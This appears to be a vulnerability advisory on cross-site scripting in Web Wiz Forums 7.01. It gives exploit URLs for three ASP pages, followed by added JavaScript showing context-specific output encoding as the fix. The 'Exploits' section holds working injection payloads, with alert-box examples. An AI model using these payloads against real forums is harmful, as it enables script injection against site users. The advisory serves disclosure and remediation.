Web Wiz Forums ver. 7.01





Information :
°°°°°°°°°°°
Language : ASP
Vulnerable version : Web Wiz Forums ver. 7.01 (and earlier ?)
Patched version : none
Website : http://www.webwizforums.com
Problem : Permanent XSS

Objects :
°°°°°°°
- forum_members.asp
- members.asp
- pm_buddy_list.asp

Exploits :
°°°°°°°°
http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22

Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22

Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.webwizforums.com...
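
Until a patch exists, the fix is output encoding matched to each context: judging by the payload shapes above, find= and SF= are written into a JavaScript string literal and desc= into a double-quoted HTML attribute. The JavaScript below is an added example, not Web Wiz Forums code; the two render templates and all function names are constructed for illustration, and [CODE] stays a literal placeholder.

```javascript
// Added example. The two render* templates are constructed stand-ins for the
// sinks implied by the advisory's URLs; the real ASP source is not on the page.

// JavaScript string-literal context (find= / SF=): emit every character outside
// a small safe set as \uXXXX so it cannot close the literal or the <script> element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,-]/g, ch =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Double-quoted HTML attribute context (desc=): encode the characters that can
// close the attribute or open a tag as numeric character references.
function htmlAttrEscape(value) {
  return String(value).replace(/[&<>"']/g, ch => '&#' + ch.charCodeAt(0) + ';');
}

const raw = value => String(value); // no encoding: the behaviour the advisory reports

function renderScriptSink(find, encode) {
  return '<script>function search(){v = "' + encode(find) + '";}</script>';
}
function renderAttrSink(desc, encode) {
  return '<input name="desc" value="' + encode(desc) + '">';
}

// Conservative checks: any raw quote, '</' or angle bracket inside the value's
// slot means the value has left the context it was written into.
function leavesJsString(html) {
  const body = html.slice(html.indexOf('"') + 1, html.lastIndexOf('"'));
  return /"|<\//.test(body);
}
function leavesAttribute(html) {
  const body = html.slice(html.indexOf('value="') + 7, html.lastIndexOf('"'));
  return /["<>]/.test(body);
}

// URL-decoded parameter values from the advisory, [CODE] left as a literal placeholder.
const FIND = '";}[CODE];function x(){v ="';
const DESC = 'B">[CODE]<a s="';

for (const [name, enc] of [['raw', raw], ['encoded', jsStringEscape]]) {
  console.log('find', name, leavesJsString(renderScriptSink(FIND, enc)));
}
for (const [name, enc] of [['raw', raw], ['encoded', htmlAttrEscape]]) {
  console.log('desc', name, leavesAttribute(renderAttrSink(DESC, enc)));
}
```

The same two encoders have to be applied server-side in the ASP pages at the point where each parameter is written out; encoding for the wrong context (HTML encoding inside the script block, for instance) does not close the hole.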


[ Copyright by [HEX] | mailto:hex@hex.net.ru ]

